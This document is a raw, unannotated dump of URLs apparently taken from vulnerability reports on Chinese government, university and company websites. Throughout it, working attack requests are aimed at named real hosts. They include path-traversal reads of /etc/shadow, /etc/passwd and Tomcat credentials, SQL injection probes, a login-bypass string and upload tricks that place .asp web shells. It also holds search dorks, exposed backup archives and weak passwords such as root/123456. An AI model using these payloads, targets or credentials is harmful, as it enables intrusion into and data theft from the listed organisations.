http://www.wuhufucai.cn/news.php?id=22 http://182.242.231.170:803/index.asp http://219.216.19.233:8081/index.asp http://220.165.85.220:8000/ http://vip.library.neusoft.edu.cn/index1.asp http://www.qzygz.com:8081/index1.asp http://210.44.80.46/index1.asp http://library.fjrtvu.edu.cn:1080/index1.asp http://www.cxstar.cn/ http://166.111.120.118/emlib4/format/release/aspx/eml_homepage.aspx http://202.112.181.252/emlib4/format/release/aspx/eml_homepage.aspx http://202.202.12.32/emlib4/format/release/aspx/eml_homepage.aspx http://202.120.143.35/emlib4/format/release/aspx/eml_homepage.aspx http://media.lib.sjtu.edu.cn/emlib4/format/release/aspx/eml_homepage.aspx http://www.wslh.net/index.php?m=content&c=index&a=lists&catid=2 http://v.pudongtv.cn/t/t1/user/bkzjsplb.aspx?m=1&n=1&uid=51&paixu=0&bkzjid=51 http://v.sygd.tv/t/t1/user/bkzjsplb.aspx?m=1&n=1&uid=51&paixu=0&bkzjid=51 http://v.zghhzx.com.cn/t/t1/user/bkzjsplb.aspx?m=1&n=1&uid=1&paixu=0&bkzjid=1 http://v.jjbctv.com/t/t1/user/bkzjsplb.aspx?m=1&n=1&uid=1&paixu=0&bkzjid=1 http://v.hcvw.cn/t/t1/user/bkzjsplb.aspx?m=1&n=1&uid=1&paixu=0&bkzjid=1 test1:11111 http://www.jsw.suzhou.gov.cn/szjswlogin/WebBuilderMis/webbuilder_login.aspx http://www.lfqx.com:8080/pms/showsystem/show121/showSystemShow121_toDataShow.action dir:D:\tomcat-6.0.35\webapps\pms\ http://qy.nantong.gov.cn/dic_getList.do http://qy.nantong.gov.cn/employee_getAllEmployee.do http://qy.nantong.gov.cn/executeLog_getExecuteLogList.do http://qy.nantong.gov.cn/loginLog_getLoginLogList.do http://qy.nantong.gov.cn/right_toRightMain.do http://qy.nantong.gov.cn/right_showRoleForRight.do http://qy.nantong.gov.cn/right_selectMenu.do http://qy.nantong.gov.cn/role_getRoleList.do http://qy.nantong.gov.cn/selectTree_showPopForStep.do http://qy.nantong.gov.cn/notice_toAddJsp.do http://qy.nantong.gov.cn/notice_getAllTongjiList.do http://qy.nantong.gov.cn/xmsz_getList.do http://qy.nantong.gov.cn/employee_competentLogin.do http://qy.nantong.gov.cn/xyEmployee_toAddEmployeeJsp.do 
http://qy.nantong.gov.cn/xyEmployee_queryAllEmployee.do http://qy.sqcz.gov.cn/xyEmployee_queryAllEmployee.do http://zdxm.nantong.gov.cn/xyEmployee_queryAllEmployee.do http://tjdata.haimen.gov.cn/xyEmployee_queryAllEmployee.do http://qyfz.czfb.gov.cn/zfzcxmgl/xyEmployee_queryAllEmployee.do http://58.221.147.11:8080/workfield/before/xyEmployee_queryAllEmployee.do http://58.221.172.42:8080/hmqlyg/xyEmployee_queryAllEmployee.do http://elqlf.haimen.gov.cn/hmqlyg/xyEmployee_queryAllEmployee.do http://cxsh.sihong.gov.cn/shcredit/xyEmployee_queryAllEmployee.do http://www.ntcredit.com/ntscredit//xyEmployee_queryAllEmployee.do http://cxsy.siyang.gov.cn/syxcredit//xyEmployee_queryAllEmployee.do http://mxzltj.nantong.gov.cn/mxzl_up//xyEmployee_queryAllEmployee.do http://58.221.206.203:8080/rgshjz//xyEmployee_queryAllEmployee.do http://58.221.172.27:8580/hmjxpg/xyEmployee_queryAllEmployee.do http://58.221.238.143:8085/qyxm/xyEmployee_queryAllEmployee.do http://58.221.238.143:8085/qyxm/xyEmployee_toAddEmployeeJsp.do http://58.221.238.143:8085/qyxm/xyEmployee_queryAllEmployee.do https://github.com/IOActive/jdwp-shellifier http://cmcc.gw.com.cn/login/check!checkuser.action http://218.30.22.96 http://218.30.22.251 http://zjdtmy.com:8888/CourseCommunity/station.action?type=7&stationCode=3307230000001382&time=20141120100103%20HTTP/1.1%20HTTP http://zjdtmy.com:8888/CourseCommunity/station.action?type=7&stationCode=3307230000001382&time=20141120100103%20HTTP/1.1%20HTTP http://zjdtmy.com:8888/CourseCommunity/station.action http://baobao.ci123.com/spaces/video/612528?tab=shipin&id=261975#top_new http://www.foyoedu.com/ http://ic.szyqwz.com/cjcx/bkxt/yqts1.asp?newsid=1 http://xszx.mhedu.sh.cn/cjcx/bkxt/yqts1.asp?newsid=1 http://www.zygz.fx.edu.sh.cn/cjcx/bkxt/yqts1.asp?newsid=1 http://zy.52sttv.com/cjcx/bkxt/yqts1.asp?newsid=1 http://www.zygz.fx.edu.sh.cn/cjcx/bkxt/yqts1.asp?newsid=1 http://blog.ci123.com/qqqccc123/photolist/134924 http://lms.ambow.net/login/toAddCompanyApply.action 
http://www.ibms.sinica.edu.tw/big5/pages/pi/index.php?id=86 http://www.ibms.sinica.edu.tw/big5/pages/pi/index.php?id=86 inurl:i.php?pid= http://www.yufeng111.com/s.php?classid=8&id=6&t=2&pid=5 http://www.hrb-bs.com//s.php?classid=8&id=6&t=2&pid=1 http://www.hljorient.com//s.php?classid=8&id=6&t=2&pid=1 http://www.zlanquan.com//s.php?classid=1&id=1&t=1&pid=1 http://www.yuelangzhineng.com/s.php?classid=1&id=1&t=1&pid=1 ftp://112.124.114.55/ http://www.jstour.gov.cn/jcms//interface/user/out_userinfo.jsp?xmlinfo= http://159.226.100.34:8080/guji/login.jsp http://pinyin.sogou.com/bbs/forum.php http://blog.ci123.com/qqqccc123 http://cwcx.jlsu.edu.cn/admin/admin_adminmodifypwd.aspx www.lxgajj.gov.cn/Admin_lxgajj/ad_login.asp_ http://demo.gavi.chinacdc.cn/登录系统 http://www.stats.gov.cn/tjsj/tjbz/xzqhdm/201401/t20140116_501070.html行政代码 http://219.141.175.204) https://github.com/greatfire","https://github.com/cn-nytimes https://211.154.163.90/ http://fzzzw.fjsen.com/school!area?level=-1&pop=-1&codeorname=&scope=-1&type=2&stype=1 http://tyb.njupt.edu.cn/newss.asp?id=465 http://www.ncl.uestc.edu.cn/main/admin/login.php pss.uestc.edu.cn/tasi/admin/system/fileformat.asp http://www.jxdz.uestc.edu.cn/ http://sms.7moo.com/ http://oa.china-cba.net/WebUI/Login.aspx http://www.fjyxt.cn/admin/FCKeditor/editor/fckeditor.html http://122.200.87.195/biportal/verifyLogin http://rb.tcl.com:81/car/login.jsp http://rb.tcl.com:81/car/serviceReg.jsp http://rb.tcl.com:81/car/zcy.jsp http://222.133.40.154/m/index.action http://**.**.**.**/modul/webcon!findTypeLi.action http://www.wangxuankj.com/IndexAction.do http://www.wangxuankj.com/ModifyNewsAction.do?newsID=1 http://60.191.202.167/zjwgyxg/ModifyNewsAction.do?newsID=1 http://www.xyysq.cn/ModifyNewsAction.do?newsID=1 http://wg.hznu.edu.cn/health/ModifyNewsAction.do?newsID=1 http://www.86998866.com:8080/ModifyNewsAction.do?newsID=728 http://shangou.lenovo.com.cn/.DS_Store http://shangou.lenovo.com.cn/login.html.bak 
http://shangou.lenovo.com.cn/index.zip http://www.jygglglj.com/jygSystem/thirdAction!getThirdList.action http://agent.yongche.com/ http://www.steelsy.com/ecp/announcement/announcement_view2.action inurl:qiye.asp?num= http://www.hzdzdd.cn/qiye.asp?num=72 http://www.yxgtj.net/qiye.asp?num=72 http://gtj.nanzheng.gov.cn/qiye.asp?num=72 http://www.xxgtj.com/qiye.asp?num=72 http://gtj.hzedz.gov.cn/qiye.asp?num=72 http://i.midea.com/ http://61.129.250.80/workorder-web/logout.html http://www.ilas.com.cn/ http://61.136.169.183/NTBookRetrNewBookInfo.aspx?NewBookNum=203333&page=1 http://218.76.255.3:9992/NTBookRetrNewBookInfo.aspx?NewBookNum=%E6%96%87%E5%AD%A6%E4%B9%A6&page=1 http://ilas.helib.net/NTBookRetrNewBookInfo.aspx?page=3&NewBookNum=11 http://211.141.112.39/NTBookRetrNewBookInfo.aspx?NewBookNum=%E5%BB%BA%E5%85%9A90%E5%91%A8%E5%B9%B4%E4%B8%93%E6%A0%8F&page=1 http://lib.wdu.edu.cn:8081/NTBookRetrNewBookInfo.aspx?NewBookNum=2015%E5%B9%B43%E6%9C%88&page=1 http://61.133.142.125:8001/ahCRHouse/index.html http://61.133.142.125:8001/ahCRHouse/tzgg/Detail.action http://www.lyfyw.com/ http://www.lyfyw.com:81/wsyycx/wsyycx/login_toLogin.action dir:D:\tomcat6.0\webapps\wsyycx\ http://mail.fjgdwl.com/pma/ user:root pass:123456 http://www.zjedu.org/tv/cate.php时K存在注射漏洞 http://www.zjedu.org/tv/cate.php http://yeyou.mop.com/payment/yee_mobile.aspx?code= http://xxgk.xxanc.gov.cn/front/main.action http://srm.tclking.com(登录处没有注入) http://srm.tclking.com/vmi/WebService/WS_Login.asmx/jsdebug http://srm.tclking.com/vmi/WebService/WS_Login.asmx http://srm.tclking.com/vmi/WebService/WS_Login.asmx?op=ChangePassWorld http://srm.tclking.com/vmi/WebServic http://www.scipo.gov.cn/ ftp://202.100.221.44/ http://portal.ecjtu.edu.cn/dcp/fileUpload?action=filedownload&fileName=black.png&filePath=uploadfiles/storage/2015/4/2/6f6f70cff21a4e5cbb7168d9da9bdad3.png http://portal.ecjtu.edu.cn/dcp/uploadfiles/storage/2015/4/2/6f6f70cff21a4e5cbb7168d9da9bdad3.png 
http://portal.ecjtu.edu.cn/dcp/fileUpload?action=filedownload&fileName=passwd&filePath=../../../../../../../../../../../../../../../../../../etc/shadow pinge.focus.cn/a/Follow http://pinge.focus.cn/a/Follow pss.uestc.edu.cn/tasi/admin/system/language.asp pss.uestc.edu.cn/tasi/admin/system/tutordept.asp pss.uestc.edu.cn/tasi/admin/system/subject.asp pss.uestc.edu.cn/tasi/admin/system/usermng.asp ftp://202.108.199.49 http://tools.yahui.cc/ http://www.oaxis.com/product_list.php?id=2 http://helpdesk.sunits.com:8088//jmx-console/ http://helpdesk.sunits.com:8088/invoker/JMXInvokerServlet http://www.wangpansou.cn/s.php?q=edu.cn&wp=0&start=0 http://es.nuist.edu.cn/phpmyadmin/ http://istudy.wanguoschool.net/Default.aspx?islogin=1 http://www.tjdag.gov.cn/tjdag/wwwroot/root/template/main/jgsl/gsfq_article.shtml?id=4641 http://220.181.69.171/ http://220.181.190.215/ http://admin.my.hd.sohu.com/mem_manager/ http://123.125.44.106/ http://123.125.44.106/giveArea http://flfw.smesd.gov.cn/clist.jsp?id=331 http://flfw.smesd.gov.cn/clist.jsp?id=331 http://www.ligchina.com.cn/joinus/joinus010101.asp?id=50 http://mis.998.com/ http://mis.998.co http://hr.ctrl.com.cn/JobDeatil.aspx?id=79 http://hr.ctrl.com.cn/Developing.aspx?id=6 http://hr.ctrl.com.cn/JobHelp.aspx?id=1 http://hr.ctrl.com.cn/News.aspx?id=2 http://hr.ctrl.com.cn/newsMore.aspx?id=19 ftp://202.114.89.64/ http://202.114.89.64:8090/Default.aspx http://www.flcit.com/index.do http://www.xmxaedu.gov.cn/mailbox!mailbox.do?mark=1&schoolCode=001245 http://www.xmxxzx.com/mailbox!mailbox.do?mark=1&schoolCode=001245 http://www.flcit.com/mailbox!mailbox.do?mark=1&schoolCode=001245 http://www.xmxayz.com/mailbox!mailbox.do?mark=1&schoolCode=001245 http://www.jmqsng.com/mailbox!mailbox.do?mark=1&schoolCode=001245 http://www.sn.10086.cn/portalmgr/app?service=page/career.MyApply&listener=queryMyApply http://www.cngrain.org/blm81/index.php http://labour.wuyishan.gov.cn/news.asp?id=222 http://www.jnsi.gov.cn:8009 
http://www.santang.com.cn/GcList.aspx?BigClassId=157&SmallClassId=158 http://202.192.18.141/AllInfor/Experiment_baseInfor.aspx?SYXH=1 http://jwmis.hnie.edu.cn/sysgl/AllInfor/Experiment_baseInfor.aspx?SYXH=1 http://58.42.243.135:9100/AllInfor/Experiment_baseInfor.aspx?SYXH=1 http://218.76.140.198:8003/AllInfor/Experiment_baseInfor.aspx?SYXH=1 http://zgp.njutcm.edu.cn/AllInfor/Experiment_baseInfor.aspx?SYXH=1 ftp://202.114.123.53/ http://221.5.88.30:9080/ ftp://202.120.53.237/ http://219.150.39.204 http://www.socket.net.cn/cn/news_detail.aspx?t=106 http://cloud.unicomgd.com:8161/admin/index.jsp cn:8080 ftp://bbs.hynews.net/ ftp://202.120.111.93/ ftp://202.120.119.151/ ftp://202.120.189.61/ ftp://202.120.43.87/ http://www.szahotel.com/admin/addUser.aspx http://www.szahotel.com/admin/szalogin99.aspx http://www.szahotel.com/admin/ http://cloud.unicomgd.com:8002/ http://www.chinasunsoft.net/ http://58.57.166.157:6006/cun/gongkai.aspx?zzdwdm=371522001001&type2=1 http://221.2.207.254:6006/cun/gongkai.aspx?zzdwdm=371501001001&type2=1 http://222.175.5.110:6006/cun/gongkai.aspx?zzdwdm=371523014029&type2=5 http://58.57.165.13:6006/cun/gongkai.aspx?zzdwdm=371524005001&type2=4 http://120.192.75.114:6006/cun/gongkai.aspx?zzdwdm=161508001001&type2=1 http://120.192.75.114:6006/cun/gongkai.aspx?zzdwdm=161508001001&type2=1 http://www.zc511.com/ http://www.zjrrt.com/addProductShoppingCart.do?amount=1&productID=248926 http://www.smdyf.cn/addProductShoppingCart.do?amount=1&productID=148596 http://www.ewj2009.com/addProductShoppingCart.do?amount=1&productID=248926 http://www.46buy.com/addProductShoppingCart.do?amount=1&productID=248926 http://www.hnjbyy.cn/addProductShoppingCart.do?amount=1&productID=248926 http://www.hnlbxdyf.com/addProductShoppingCart.do?amount=1&productID=248926 http://test.gxjjls.com/addProductShoppingCart.do?amount=1&productID=248926 http://test.hzyibai.com/addProductShoppingCart.do?amount=1&productID=248926 
http://www.smdyf.cn/addProductShoppingCart.do?amount=1&“productID=148596” http://www.smdyf.cn/addProductShoppingCart.do?amount=1&productID=148596 www.smdyf.cn http://dtsmt.gw.com.cn/bbs/uc_server/admin.php http://beian.ncfdj.gov.cn:8080/pub_buildctrl.aspx?buildcode=14110093753288 http://61.184.26.226:8081/pub_buildctrl.aspx?buildcode=13898568821001 http://218.89.108.173:8080/pub_buildctrl.aspx?buildcode=134665591925025 http://www.ahbzfdc.com:8080/pub_buildctrl.aspx?buildcode=13528637561001 http://www.bzfcj.gov.cn:9090/pub_buildctrl.aspx?buildcode=13100939741001 http://www.bzfcj.gov.cn:9090/pub_buildctrl.aspx?buildcode=13100939741001 http://lar.unicomgd.com/ http://wooyun.org/bugs/wooyun-2015-099087 http://lar.unicomgd.com/WebResource.axd?d=rF9mcFBXRdOs0vsKIxd7PQ2 ftp://**.**.**/_ http://admin.unisk.cn/ http://crm.tianya.cn/ http://www.renrenle.cn/share/download.jsp?filePath=/WEB-INF/web.xml http://java.sun.com/xml/ns/j2ee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd java:/WEBDS http://ckeditor.com http://java.sun.com/jsp/jstl/core http://java.sun.com/jsp/jstl/fmt http://java.sun.com/jsp/jstl/functions http://java.sun.com/jsp/jstl/sql http://java.sun.com/jsp/jstl/xml http://java.sun.com/jsp/jstl/core_rt http://www.renrenle.cn/share/download.jsp?filePath=/WEB-INF/mail.properties http://duty.wocloud.cn/index.htm http://211.81.174.133:81/dlib/dir.asp?lang=gb&DocID=88609 http://reserve.calis.edu.cn/dlib/dir.asp?lang=gb&DocID=88609 http://dlib.fxlib.cn:8282/dlib/dir.asp?lang=gb&DocID=88609 http://61.167.120.67:8083/DLib/dir.asp?lang=gb&DocID=88609 http://dzts.nsjy.com/dlib/dir.asp?lang=gb&DocID=88609 http://admin.unisk.cn/ad/ http://xxx.xxx.xxx.xxx/xx/xx,username,pas***** https://github.com/cnydpl/Eval/blob/master/Eval/settings.py http://hjedu.dg.gov.cn/printpage.asp?articleid=7808 http://hjedu.dg.gov.cn/Admin_login.asp 
http://hjedu.dg.gov.cn/printpage.asp?articleid=7 http://hjedu.dg.gov.cn/printpage.asp?articleid=7 https://61.189.156.196 http://www.aqjyw.gov.cn http://www.xmgqzx.com/dms/files!getPickFiles.do http://www.xmxayz.com/dms/files!getPickFiles.do http://www.xmxdzx.com/dms/files!getPickFiles.do http://xmjmzx.xmedu.cn/dms/files!getPickFiles.do http://www.xmblxx.com/dms/files!getPickFiles.do http://hd.tiexue.net http://www.bioknow.net/portal/root/website_bioknow/index.jsp http://www.bioknow.cn/portal/root/lims_std/gyxt.jsp?lmbm=YHXZ http://211.69.141.135/portal/root/lims_std/gyxt.jsp?lmbm=YHXZ http://202.38.77.223:8000/portal/root/lims_std/gyxt.jsp?lmbm=YHXZ http://venus.ipc.pku.edu.cn/portal/root/lims_std/gyxt.jsp?lmbm=YHXZ http://molpharm.jiangnan.edu.cn/portal/root/lims_std/gyxt.jsp?lmbm=YHXZ ftp://202.202.111.188/ http://www.flcit.com/ http://www.xmxdzx.com/morelist!morelist.do?keytype=1&actdo=search&btnSubmit=123&keywords= http://www.xmyfzx.com/morelist!morelist.do?keytype=1&actdo=search&btnSubmit=123&keywords= http://www.sssmfx.com/morelist!morelist.do?keytype=1&actdo=search&btnSubmit=123&keywords= http://hqzx.smjy.net/morelist!morelist.do?keytype=1&actdo=search&btnSubmit=123&keywords= http://jydd.xmhcedu.gov.cn/morelist!morelist.do?keytype=1&actdo=search&btnSubmit=123&keywords= http://123.147.162.12:8088/neon_admin/admin/index.htm http://221.5.243.13:8088/neon_admin/admin/index.htm ftp://**.**.** http://shop.ali213.com//my/orderDetail.html?id=175558 http://shop.ali213.com//my/orderDetail.html?id=175500%20and%201=1 http://shop.ali213.com//my/orderDetail.html?id=175500%20and%201=2 http://shop.ali213.com//my/orderDetail.html?id=175500%20order%20by%2024 http://shop.ali213.com//my/orderDetail.html?id=175500%20order%20by%2025 ftp://**.**.** inurl:cpzs.asp?ProClass= http://www.sinojm.com/ http://www.sqyqmy.com/ http://www.njpinan.com/ http://www.sdlnjs.com/ http://www.njzjn.com/ http://www.jshlzd.com/ http://www.wgjjw.com/ http://www.chetjs.com/ http://www.sqwpwy.com/ 
http://www.jssgjy.cn/ http://njmayi-bj.com/ http://www.njxmj.com/ http://jswdzs.com/ http://www.njrhlqkj.com/ http://www.njhpzkb.com/ http://njxiangyu.com/ http://www.hahjzs.com/ http://www.yhwxjy.cn/ http://www.njyll.cn/ http://www.xinfeng168.net/ http://pub.px.gw.com.cn/training/download.jsp?filename=training/video/2008/12/23/../../../../../../../../../../../../etc/passwd&name=c http://pub.px.gw.com.cn/training/down.jsp?filename=training/video/2008/12/23/../../../../../../../../../../../../etc/passwd&name=c http://pub.px.gw.com.cn/training/download.jsp?filename=training/video/2008/12/23/../../../../../../../../../../../../opt/apache-tomcat-7.0.8/tomcat-users.xml&name=c http://pub.px.gw.com.cn/training/download.jsp?filename=training/video/2008/12/23/../../../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0&name=c ftp://gxda.gxi.gov.cn/ www.sxbus.com http://push.my.tv.sohu.com/user/a/fo/batchadd.do?uids=201277014&passport=mailingtesting@163.com http://push.my.tv.sohu.com/user/a/fo/batchadd.do?uids=201277014&passport=mailingtesting@163.com,passport为用户的邮箱,搜狐用户的tv用户量还是较大的,随意搜索一些,即可为自己的视频增加订阅量了 http://admin.swxqzs.nsjy.com/login.action http://115.182.12.81/toLogin http://admin.ha.cc/ http://game.letv.com http://emzyxw.njfu.edu.cn存在注入漏洞,用sqlmap可直接拿到管理员帐号密码 http://jsedu.njfu.edu.cn后台登陆绕过语句万能密码1'or'1'='1,真没想到学校的站也能这样 http://jg.njfu.edu.cn弱口令admin job.sicau.edu.cn/tz.php https://github.com/yuekaizong/yzrcm/blob/9245c6c1b05bd79ef7d379524d112a9a6a4c4ec5/%E7%9B%B8%E5%85%B3/%E5%88%86%E4%BA%AB.txt http://www.96877.sh.cn/admin/login.htm http://www.xinyour.net/ http://www.xinyour.com/About-3.html http://manage.xinyour.com/ http://101.227.20.240/report/view/2/ http://101.227.20.240/report/pass/1/ http://xxx.xxx http://xxx.xxx http://xxx.xxx http://202.108.98.98//pcheck.asp http://117.79.228.14/user/index/User_page/ http://61.154.9.9:8009/ http://www.tbmmis.com/Login.aspx http://tg.gw.com.cn/tzzgx/admin/login.php” http://tg.gw.com.cn/tzzgx/admin/add.php 
http://tg.gw.com.cn/tzzgx/admin/add.php?id=368 http://tg.gw.com.cn/tzzgx/admin/upload/ http://tg.gw.com.cn/tzzgx/admin/upload/150406093742.php http://www.qhdksy.cn/flm/flm_xx.php?fid=162 http://beian.ocn.net.cn/ http://ipi.tongji.edu.cn/admin/mod/default/index.php http://www.yiqibian.com/index.php?m=member&c=index&a=public_college_password_mobile http://www.yiqibian.com/index.php?m=member&c=index&a=public_college_password_mobile&step=2 http://www.sobeycollege.com/ http://www.yiqibian.com/ http://csearch.cloudtv.ocn.net.cn/login.action http://bmxt.mca.gov.cn/scheck.asp http://bmxt.mca.gov.cn/pcheck.asp http://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&tn=baidu&wd=第二步%3A将第一步复制出来的订单号粘贴到下方淘宝订单号中%2C网站会员帐号和密码为您&rsv_pq=9dae0f700004cf1d&rsv_t=2dc85x7kS%2Bac%2BlIRiBfX8DvDlyFN9rQl%2FaXaUmeDBy%2BKshQBhH3FrjK%2BsJw&rsv_enter=0&inputT=577&rsv_n=2&rsv_sug4=577 http://www.qibasan.com/taobao/ http://msf.cq119.gov.cn:8083/cqcms/index.jsp http://125.70.242.237:81/qdsp/ www.boojob.com www.hr800.cn www.gaojob.com这个也是捷通人才系统 www.rcsc.com这个也是捷通人才系统 cn:8080 http://video.gw.com.cn/voideservlet?timestamp=1428290659451 http://www.day900.com/ http://www.qysi.gov.cn/websys/jsp/website/emailbox/emailbox_more.jsp?org_id=001 http://qysi.gov.cn/websys/jsp/website/common/pub_view.jsp?org_id=001&SDIR_CODE=200609280000000112&SFILE_ID=201503170000002801 http://dts.gw.com.cn/outlets.php http://220.170.145.173:8879/bookingHosClient/logoutAction.action http://220.191.211.161/login/login.do http://www.ngfgj.cn:8001/user/login.action http://wooyun.org/bugs/wooyun-2015-0103532 http://www.czfc.org.cn/news/news_show.asp?news_id=897 http://www.czfc.org.cn/kjcx_view.asp?h_key=true&nytypeid=ny36x7 http://www.czfc.org.cn/gift_search.asp?pagen=2&startD=&endD=&qh=&giftNumber=&action=search&type=%27%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17%27%2C+%27%BA%C3%B2%CA36%27%2C+%27%C4%CF%D4%C1%B7%E7%B2%CA26%D1%A15%27%2C+%27%BA%C3%B2%CA26%27%2C+%27%CB%AB%C9%AB%C7%F2%27%2C+%27%B8%A3%B2%CA3D%27 
http://www.czfc.org.cn/kjnum_36x7_mx.asp?krs=2015085 http://www.czfc.org.cn/txxw_contact2.asp?ProductID=2195 http://www.crmshwlzx.com/jiajia/news_Show_user.asp?ID=709 http://www.crmstjc.com.cn/news_Show_user.asp?ID=931 http://www.crmsyc.com.cn/news_Show_user.asp?ID=1939 http://www.crm-xa.com/news_Show_user.asp?ID=759 http://www.ztyh.com.cn/news_Show_user.asp?ID=1656 http://www.jggw.suzhou.gov.cn/BLS/IndexList.aspx?type=QuestionsType_3 http://www.jggw.suzhou.gov.cn/lecture/lecture_detail.aspx?lectureId=22 http://www.szbb.suzhou.gov.cn/root.rar http://www.szbb.suzhou.gov.cn/jgsz.php?class_id=53&top=&Type_id=61 http://www.sjhlcs.com/admin/manage.asp无需登录即可操作 http://www.sjhlcs.com/admin/editer/UpPic.asp无需权限即可上传 http://zhidao.baidu.com/ihome ftp://bbs.hynews.net/ http://www.fecb.com.cn http://pk.baofen.ali213.net/login?id=51 http://life.imnu.edu.cn http://agriplan.njau.edu.cn http://www.sdtz.sdu.edu.cn http://www.wangpiao.com http://xxqn.ujn.edu.cn http://www.dfzq.com.cn/dfzq.tar.gz http://admin.xgo.com.cn/admincp.php?action=content_edit&documentid=1163854&ord=1427824013 http://www.day900.com/ http://a1.greentree.cn:8098/Service.asmx http://my.39.net//ashx/MyQuestion.ashx?QuesType=QuestionList&TagName=%25B8%25DF%25D1%25AA%25D1%25B9 http://haijun.xaut.edu.cn www.yiban.cn http://jurist.whu.edu.cn http://stat.ruc.edu.cn/ inurl:article.php?m= http://case.xmu.edu.cn/article.php?m=1 http://www.hengren.com/article.php?m=5 http://www.yl-photo.com/article.php?m=9 http://www.dazuixing.com/article.php?m=1 http://www.netcontrol.com.cn/article.php?m=15 http://sj10.xm12t.com.cn/article.php?m=19 http://www.xmeczy.com/article.php?m=8 http://www.pinmaidao.cn/article.php?m=1 http://xmtbao1.xm55.host.35.com/article.php?m=5 http://sj18.xm12t.com.cn/article.php?m=19 http://xmirjd.com/article.php?m=5 http://sinoleading.com.cn/article.php?m=1 http://xmzqit.cn/article.php?m=10 http://hysmwh.com/article.php?m=9 http://www.xmmeiwangda.com/article.php?m=1 http://www.xmcue.com/article.php?m=5 
http://xiamenyuhui.com/article.php?m=1 http://xmgjd.com/article.php?m=7 http://fjyqjx.com/article.php?m=1 http://www.lhcoving.com/article.php?m=1 http://www.5047438.com/article.php?m=12 http://www.jscnnet.com/ http://www.wooyun.org/bugs/wooyun-2014-065194/ http://www.jscnnet.com//DesktopModules/C_Info/WebService/C_InfoService.asmx?op=GetArticleHitsArray www.jscnnet.com http://tempuri.org/GetArticleHitsArray soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ soap:Body soap:Envelope inurl:newsinfo.aspx?columntitle= http://121.30.251.3:85/portal/xzsp3/newsinfo.aspx?columntitle=%E4%B8%AD%E5%BF%83%E7%AE%80%E4%BB%8B http://60.220.253.153:81/portal/xzsp_zhangzi/newsinfo.aspx?columntitle=%E5%AE%A1%E6%94%B9%E5%8A%A8%E6%80%81 http://www.gjzwzx.cn/portal/xzsp3/newsinfo.aspx?columntitle=%E4%B8%AD%E5%BF%83%E5%8A%A8%E6%80%81 http://www.hdxzwzx.com/portal/xzsp_handanxian1/newsinfo.aspx?columntitle=%E4%B8%AD%E5%BF%83%E5%8A%A8%E6%80%81 http://211.142.37.152:85/portal/xzsp3/newsinfo.aspx?columntitle=%E4%B8%AD%E5%BF%83%E5%8A%A8%E6%80%81 http://www.bdxzfw.cn/portal/xzsp/newsinfo.aspx?columntitle=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81 demo:http://show.wecrm.com/xt/main http://www.ecjtu.edu.cn/ http://www.suqianlawyer.com///syWebEditor/Sel_UploadFile.asp http://www.suqianlawyer.com/syWebEditor/Sel_UploadFile.asp?obj=AdvUrl&fileType=gif|jpg|asp;.jpg|&filePathType=1&filePath=/syWebEditor/UploadFile/ http://www.suqianlawyer.com/syWebEditor/UploadFile/QQ图片20150406185040.asp.jpg http://www.suqianlawyer.com/syWebEditor/Sel_UploadFile.asp?obj=AdvUrl&fileType=gif|jpg|.;asp|&filePathType=1&filePath=/syWebEditor/UploadFile/ http://www.suqianlawyer.com//syWebEditor/UploadFile/1.asp http://www.zhubian88.cn/syWebEditor/UploadFile/1.asp http://www.suqianlawyer.com//syWebEditor/UploadFile/1.asp http://www.haomiaoyz.com/syWebEditor/UploadFile/1.asp 
http://www.w8118w.cn/syWebEditor/UploadFile/1.asp http://jiansh101.view.rrhjz.org/main/DownLoad.asp?sType=DownFile&FileName=/Web.config http://i.yeepay.com/shtml/success.shtml?agentCode=Agent00002286R&mobileNo=15285004012&realAmount=30.15&requestId=ONLINE10006916690&returnInfo=000000&subValue=30.0 http://218.78.241.80/anmai/KY_Mamage/Integrate_Select/OutlayEarning_Select_particular.aspx?id=1 http://jmzx.xmedu.cn:9999/anmai/KY_Mamage/Integrate_Select/OutlayEarning_Select_particular.aspx?id=1 http://www.gxbyzx.cn:88/anmai/KY_Mamage/Integrate_Select/OutlayEarning_Select_particular.aspx?id=1 http://oa.w12z.com/anmai/KY_Mamage/Integrate_Select/OutlayEarning_Select_particular.aspx?id=1 http://www.xwgjzx.com:8888/anmai/KY_Mamage/Integrate_Select/OutlayEarning_Select_particular.aspx?id=1 http://asp.39.net/User/Login inurl:http://gzb.gcp.glodon.com/view.do?&pagestate= http://app.uc.cn/appstore/AppCenter/api/activate_uc?uc_param_str=nieidnutssvebipfcp&src=uc_video&dest_url=ext:uc_dw:http://addondl.uc.cn/resources/pkg/thunder.apk http://dts.gw.com.cn/newslist.php http://mo.gw.com.cn/test.php[没爆破成功 inurl:RESOURCE/kindcontent http://www.yuysoft.com/index.asp http://liuyang.ccgp-hunan.gov.cn/newsAction!getMap.action http://ntzx.cn/data/backup/VICWOR~2.SQL http://v.wxxscm.com.cn/data/backup/VICWOR~2.SQL http://vod.czgd.cn/data/backup/VICWOR~1.SQL http://218.7.16.70/data/backup/VICWOR~1.SQL http://v.lhjy.net/data/backup/VICWOR~1.SQL http://www.wyzc.com/index.php?a=career&m=User&c=setUserInfo http://www.wyzc.com/index.php?a=order&m=Payment&c=finish&order_id=2175 http://202.127.45.72/ http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://my.shushi100.com/popajax/disput.aspx?action= http://www.cits.cn/member/getbackpasswd.html?sendTime=MjAxNS0wNC0wNyAxMjozOQ==&userValue=Ynl6aGl3ZW5AdmlwLnFxLmNvbQ==&userType=ZW1haWw=&submitType=emailResetpws 
